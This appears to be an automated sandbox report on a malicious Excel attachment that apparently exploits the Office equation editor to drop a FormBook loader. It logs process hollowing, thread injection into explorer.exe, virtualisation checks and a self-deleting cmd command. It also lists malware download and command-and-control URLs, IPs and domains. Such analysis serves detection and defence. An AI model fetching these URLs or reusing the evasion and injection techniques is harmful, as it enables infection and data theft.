Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$REMITTANCE ADVICE.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRDE1E.tmp
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@9/24@4/5
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.526224259.00000000008A0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.464564394.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.465728410.0000000000590000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.525516222.0000000000720000.00000040.00000001.sdmp, explorer.exe, explorer.exe, 00000007.00000002.670738213.0000000002920000.00000040.00000001.sdmp
Source: Binary string: explorer.pdb source: vbc.exe, 00000005.00000002.527175937.0000000002980000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.523078790.00000000023C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.523696493.00000000026A0000.00000004.00000001.sdmp
Source: C:\Users\Public\vbc.exe | Code function: 4_2_1000FB15 push ecx; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B822 push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B82B push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B88C push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B7D5 push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0073DFA1 push ecx; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041B7D5 push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041B822 push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041B82B push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041B88C push eax; ret
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027BDFA1 push ecx; ret
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0009B7D5 push eax; ret
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0009B82B push eax; ret
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0009B822 push eax; ret
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0009B88C push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exe | RDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exe | RDTSC instruction interceptor: First address: 000000000008899E second address: 00000000000889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2848 | Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004088D0 rdtsc
          Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405C22 FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402630 FindFirstFileA,
          Source: explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.491408805.000000000457A000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.486729602.0000000008374000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0P
          Source: explorer.exe, 00000006.00000000.491408805.000000000457A000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.465457023.00000000005F4000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.467565741.000000000029B000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.491408805.000000000457A000.00000004.00000001.sdmp | Binary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech
          Source: explorer.exe, 00000006.00000000.473158769.00000000045D6000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_1000E2A9 _memset,IsDebuggerPresent,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_10010D8B EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_10001000 GetProcessHeap,HeapAlloc,CreateFileW,GetProcessHeap,HeapFree,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004088D0 rdtsc
          Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exe | Process token adjusted: Debug
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_007426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_027C26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exe | Process queried: DebugPort
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00409B40 LdrLoadDll,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_1000F215 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.yhxt13800.com
          Source: C:\Windows\explorer.exe | Network Connect: 154.205.233.189 80
          Source: C:\Windows\explorer.exe | Network Connect: 156.234.44.48 80
          Source: C:\Windows\explorer.exe | Domain query: www.ff4cu6twc.xyz
          Source: C:\Windows\explorer.exe | Network Connect: 23.225.139.107 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Domain query: www.promtgloan.com
          Source: C:\Windows\explorer.exe | Domain query: www.clicktoreach.com
          Sample uses process hollowing technique
          Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: F20000
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1764
          Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1764
          Source: C:\Windows\SysWOW64\explorer.exe | Thread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: vbc.exe, 00000005.00000002.527175937.0000000002980000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.523078790.00000000023C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.523696493.00000000026A0000.00000004.00000001.sdmp | Binary or memory string: Proxy DesktopProgmanSoftware\Microsoft\Windows\CurrentVersion\RunOnce
          Source: vbc.exe, 00000005.00000002.527175937.0000000002980000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.523078790.00000000023C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.523696493.00000000026A0000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.508092324.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.468666019.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.488027392.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.480164349.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.670498476.0000000001200000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.508092324.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.468666019.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.488027392.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.480164349.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.670498476.0000000001200000.00000002.00020000.sdmp | Binary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.508092324.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.468666019.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.488027392.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.480164349.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.670498476.0000000001200000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_1000DD84 cpuid
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          (The number in parentheses after a technique is the count of matched signatures shown in the matrix; an empty cell means no technique was mapped for that column.)

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API (1) | Path Interception | Process Injection (612) | Masquerading (111) | OS Credential Dumping | Security Software Discovery (251) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot (1)
          Default Accounts | Shared Modules (1) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion (2) | LSASS Memory | Virtualization/Sandbox Evasion (2) | Remote Desktop Protocol | Clipboard Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (14) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Exploitation for Client Execution (13) | Logon Script (Windows) | Logon Script (Windows) | Process Injection (612) | Security Account Manager | Process Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information (1) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (123) | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information (3) | LSA Secrets | File and Directory Discovery (2) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing (1) | Cached Domain Credentials | System Information Discovery (114) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

          Behavior Graph

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Behavior Graph ID: 528736
          Sample: REMITTANCE ADVICE.xlsx
          Startdate: 25/11/2021
          Architecture: WINDOWS
          Score: 100

          Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures

          Process tree recovered from the graph image (numbers in square brackets are the node counters drawn on the graph, see legend):
          EXCEL.EXE [33 29] (started)
            dropped: C:\Users\user\...\~$REMITTANCE ADVICE.xlsx, data
          EQNEDT32.EXE [12] (started)
            network: 192.210.173.90, 49167, 80 AS-COLOCROSSINGUS United States
            dropped: C:\Users\user\AppData\Local\...\vbc[1].exe, PE32
            dropped: C:\Users\Public\vbc.exe, PE32
            signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            vbc.exe [17] (started)
              dropped: C:\Users\user\AppData\Local\Temp\...\otav.dll, PE32
              signature: Tries to detect virtualization through RDTSC time measurements
              signature: Injects a PE file into a foreign processes
              vbc.exe (started)
                signature: Modifies the context of a thread in another process (thread injection)
                signature: Maps a DLL or memory area into another process
                signature: Sample uses process hollowing technique
                signature: Queues an APC in another process (thread injection)
                explorer.exe (injected)
                  network: www.clicktoreach.com 156.234.44.48, 49171, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles
                  network: www.yhxt13800.com 154.205.233.189, 49169, 80 IKGUL-26484US Seychelles
                  network: 4 other IPs or domains
                  signature: System process connects to network (likely due to code injection or exploit)
                  signature: Performs DNS queries to domains with low reputation
                  explorer.exe (started)
                    signature: Modifies the context of a thread in another process (thread injection)
                    signature: Maps a DLL or memory area into another process
                    signature: Tries to detect virtualization through RDTSC time measurements
                    cmd.exe (started)

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          REMITTANCE ADVICE.xlsx | 35% | Virustotal |
          REMITTANCE ADVICE.xlsx | 43% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dll | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 9% | Metadefender |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 27% | ReversingLabs | Win32.Trojan.Generic
          C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dll | 41% | ReversingLabs | Win32.Trojan.Generic

          Unpacked PE Files

          Source | Detection | Scanner | Label
          7.2.explorer.exe.2ca796c.7.unpack | 100% | Avira | TR/Patched.Ren.Gen
          5.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          4.2.vbc.exe.510000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.0.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.0.vbc.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          5.0.vbc.exe.400000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.2.explorer.exe.41b680.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
          5.0.vbc.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.1.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://192.210.173.90/70007/vbc.exe | 100% | Avira URL Cloud | malware
          http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
          www.ff4cu6twc.xyz/m07f/ | 100% | Avira URL Cloud | phishing
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          http://www.clicktoreach.com/m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6jie/kGfA2Y9msKDFCRQxq0nA== | 0% | Avira URL Cloud | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          http://treyresearch.net | 0% | URL Reputation | safe
          http://java.sun.com | 0% | URL Reputation | safe
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
